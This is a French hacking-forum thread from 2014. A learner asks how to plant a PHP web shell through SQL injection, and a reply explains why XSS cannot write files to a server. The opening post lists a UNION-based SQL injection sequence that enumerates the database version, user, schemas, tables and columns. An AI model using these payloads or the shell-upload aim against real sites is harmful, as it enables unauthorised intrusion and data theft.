NewbieContest

Général => Général => Discussion démarrée par: hannibal-lecter le 05 Janvier 2014 à 16:33:05


Titre: besoin d'aide apprentissage faille web.
Posté par: hannibal-lecter le 05 Janvier 2014 à 16:33:05
Bonjour,

Je recherche une ou des personnes assez douer en faille web pour m'apprendre un peut, je fais divers test de piratage en local et notamment les faille web, j'aimerais savoir comment puis-je uploader un shell php a travers une injection sql sans passer par le panel mysql>

Je sais qu'il existe 3 manière pour le faire :
------------------------------------------------------

1- En obtenant les users et mots de passe de la base de donnée mysql> (privilègue root)
2- Par l’intermédiaire d'un formulaire si dans l'administration de ce site il y en a un de présent, ( cela peut comporter des contournement de forcing a l'upload).
3- En modifiant un module (par exemple joomla).


donc voilà ma procédure de base ...

http://localhost/index.php?id=16
http://localhost/index.php?id=16+order+by+3--
http://localhost/index.php?id=-16+union+all+select+1,2--
http://localhost/index.php?id=-16+union+all+select+version(),2--
http://localhost/index.php?id=-16+union+all+select+user(),2--
http://localhost/index.php?id=-16+union+all+select+database(),2--
http://localhost/index.php?id=-16+union+all+select+1,table_name+from+information_schema.tables--
http://localhost/index.php?id=-16+union+all+select+1,group_concat(schema_name)+from+information_schema.schemata--
http://localhost/index.php?id=-16+union+all+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema=database()--

je voudrais procéder ainsi pour l'upload shell ou par xss (mais ça j'en est aucune idée)


si une personne aurait une solution autre que cela merci d'avance.






Titre: Re : besoin d'aide apprentissage faille web.
Posté par: the lsd le 13 Janvier 2014 à 11:48:33
Io,

Uploader un shell via XSS, bon courage. C'est pas possible directement. Par exemple, tu pourrais si tu trouvais une XSS, que l'admin du site clique sur ta xss ou l'éxecute en allant sur une page (dépend de si ta xss est permanente ou non), et que ta XSS fasse exécuter les bonnes commandes à l'admin. Mais pour ça, il faut savoir exactement comment fonctionne le backoffice du site. Mais du JS client side ne pourra jamais écrire sur le serveur.

Via SQL c'est plus facile déjà, il existe quelques commandes pour écrire sur le serveur avec mysql, je les ai plus en tête, je te laisse chercher :)

Enjoy

The lsd


Powered by SMF 1.1.21 | SMF © 2006-2011, Simple Machines